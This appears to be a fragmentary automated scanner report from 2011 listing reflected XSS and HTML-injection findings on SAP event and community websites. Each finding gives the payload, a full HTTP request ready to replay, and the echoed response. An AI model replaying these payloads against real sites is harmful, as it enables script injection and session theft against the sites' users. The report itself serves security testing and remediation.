<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> S ...[SNIP]... <input id="retUrl" type="hidden"value ="http://www.sapandasug.com/virtual/?ReturnUrl=http://www.sapphirenow.com/login.aspx?ReturnUrl=/default.aspx&a00f1"style="x:expression(alert(1))"5e28a9da3e5=1" style="width: 668px" /> ...[SNIP]...
3.112. http://www.sapvirtualevents.com/teched [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sapvirtualevents.com
Path:
/teched
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8105'-alert(1)-'ed14687c86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /teched?d8105'-alert(1)-'ed14687c86f=1 HTTP/1.1 Host: www.sapvirtualevents.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: UrlRewriter.NET 2.0.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 15 Oct 2011 14:30:55 GMT Content-Length: 92618
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.113. http://www.sapvirtualevents.com/teched/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sapvirtualevents.com
Path:
/teched/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4b6c'-alert(1)-'d067c1ecac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /teched/?d4b6c'-alert(1)-'d067c1ecac1=1 HTTP/1.1 Host: www.sapvirtualevents.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: UrlRewriter.NET 2.0.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 15 Oct 2011 14:30:40 GMT Content-Length: 92618
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.114. http://www.sapvirtualevents.com/teched/Sessions.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sapvirtualevents.com
Path:
/teched/Sessions.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af3a6'-alert(1)-'cb07f8d2693 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /teched/Sessions.aspx?af3a6'-alert(1)-'cb07f8d2693=1 HTTP/1.1 Host: www.sapvirtualevents.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sat, 15 Oct 2011 15:05:07 GMT Connection: close X-Powered-By: UrlRewriter.NET 2.0.0 X-Powered-By: ASP.NET Content-Length: 81914
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.115. http://www.sapvirtualevents.com/teched/default.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sapvirtualevents.com
Path:
/teched/default.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5afd5'-alert(1)-'3a8fca97ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ReturnUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 433fe'%3balert(1)//fea0f539288 was submitted in the ReturnUrl parameter. This input was echoed as 433fe';alert(1)//fea0f539288 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26433fe'%3balert(1)//fea0f539288 HTTP/1.1 Host: www.sapvirtualevents.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: UrlRewriter.NET 2.0.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 15 Oct 2011 14:30:56 GMT Content-Length: 92626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.117. http://www.sapvirtualevents.com/teched/sessiondetails.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sapvirtualevents.com
Path:
/teched/sessiondetails.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee866'-alert(1)-'cfeab9a4511 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /teched/sessiondetails.aspx?ee866'-alert(1)-'cfeab9a4511=1 HTTP/1.1 Host: www.sapvirtualevents.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sat, 15 Oct 2011 15:05:11 GMT Connection: close X-Powered-By: UrlRewriter.NET 2.0.0 X-Powered-By: ASP.NET Content-Length: 87238
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.118. http://www.sdn.sap.com/irj/scn/advancedsearch [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/scn/advancedsearch
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 926f2"><a>1b7807551cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Content-Length: 28856 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 15:01:13 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/advancedsearch?query=xss+password+help+faq+contact&926f2"><a>1b7807551cd=1"> ...[SNIP]...
The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d29"><a>12c19bdc070 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Content-Length: 28909 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 15:00:43 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/advancedsearch?query=xss+password+help+faq+contact95d29"><a>12c19bdc070"> ...[SNIP]...
3.120. http://www.sdn.sap.com/irj/scn/bc [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/scn/bc
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf04"><a>cae7ae068e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/scn/bc?8cf04"><a>cae7ae068e4=1 HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Date: Sat, 15 Oct 2011 15:05:17 GMT Content-Length: 23294 Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/bc?8cf04"><a>cae7ae068e4=1"> ...[SNIP]...
3.121. http://www.sdn.sap.com/irj/scn/downloads [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/scn/downloads
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aa4b"><a>cc0ea3522ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/scn/downloads?6aa4b"><a>cc0ea3522ee=1 HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== SDN_RES_KEY: /webcontent/uuid/087fe75d-0501-0010-11bf-80f5c43d4f0c Expires: 0 Date: Sat, 15 Oct 2011 15:05:13 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PortalAlias=scn; Path=/ Content-Length: 61396
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/downloads?6aa4b"><a>cc0ea3522ee=1"> ...[SNIP]...
3.122. http://www.sdn.sap.com/irj/scn/index [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/scn/index
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b43e"><a>55547d3eb18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/scn/index?3b43e"><a>55547d3eb18=1 HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== SDN_RES_KEY: /webcontent/uuid/10956870-6186-2b10-86ab-e0bbdc47e11f Expires: 0 Date: Sat, 15 Oct 2011 15:05:08 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PortalAlias=scn; Path=/ Content-Length: 57953
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/index?3b43e"><a>55547d3eb18=1"> ...[SNIP]...
3.123. http://www.sdn.sap.com/irj/scn/logon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/scn/logon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6a6d"><a>e74a0162951 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/scn/logon?c6a6d"><a>e74a0162951=1 HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Date: Sat, 15 Oct 2011 15:05:10 GMT Content-Length: 21705 Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/logon?c6a6d"><a>e74a0162951=1"> ...[SNIP]...
3.124. http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/scn/sdnweblogs/popularposts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e88"><a>b718e3f5e9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Content-Length: 30557 Date: Sat, 15 Oct 2011 14:59:26 GMT Connection: close Vary: Accept-Encoding Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/sdnweblogs/popularposts?21e88"><a>b718e3f5e9a=1"> ...[SNIP]...
The value of the blog request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b98"><a>ea3bc329510 was submitted in the blog parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw== Expires: 0 Content-Length: 28808 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:25:53 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/weblogs/topic/2774b98"><a>ea3bc329510"> ...[SNIP]...
3.126. http://www.sdn.sap.com/irj/scn/weblogs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/scn/weblogs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7cea"><a>41405d9f727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw== Expires: 0 Content-Length: 28819 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:26:27 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/weblogs/topic/27&e7cea"><a>41405d9f727=1"> ...[SNIP]...
3.127. http://www.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/sdn/logon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77470"><a>5b7498adf8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/sdn/logon?77470"><a>5b7498adf8d=1 HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Date: Sat, 15 Oct 2011 15:05:27 GMT Content-Length: 21730 Connection: close Set-Cookie: PortalAlias=sdn; Path=/ Set-Cookie: PortalAlias=sdn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn/logon?77470"><a>5b7498adf8d=1"> ...[SNIP]...
3.128. http://www.sdn.sap.com/irj/sdn/mypoints [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/sdn/mypoints
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff7d"><a>9b3a83d8c4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/sdn/mypoints?6ff7d"><a>9b3a83d8c4b=1 HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Date: Sat, 15 Oct 2011 15:05:36 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PortalAlias=sdn; Path=/ Set-Cookie: PortalAlias=sdn; Path=/ Content-Length: 45094
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn/mypoints?6ff7d"><a>9b3a83d8c4b=1"> ...[SNIP]...
The value of the RelayState request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d1c0"><a>a6b35360b1d was submitted in the RelayState parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the SAMLRequest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74723"><a>f29ab74680 was submitted in the SAMLRequest parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg== SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw== SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da Expires: 0 Content-Length: 33748 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:34:56 GMT Connection: keep-alive Set-Cookie: PortalAlias=sme; Path=/; secure
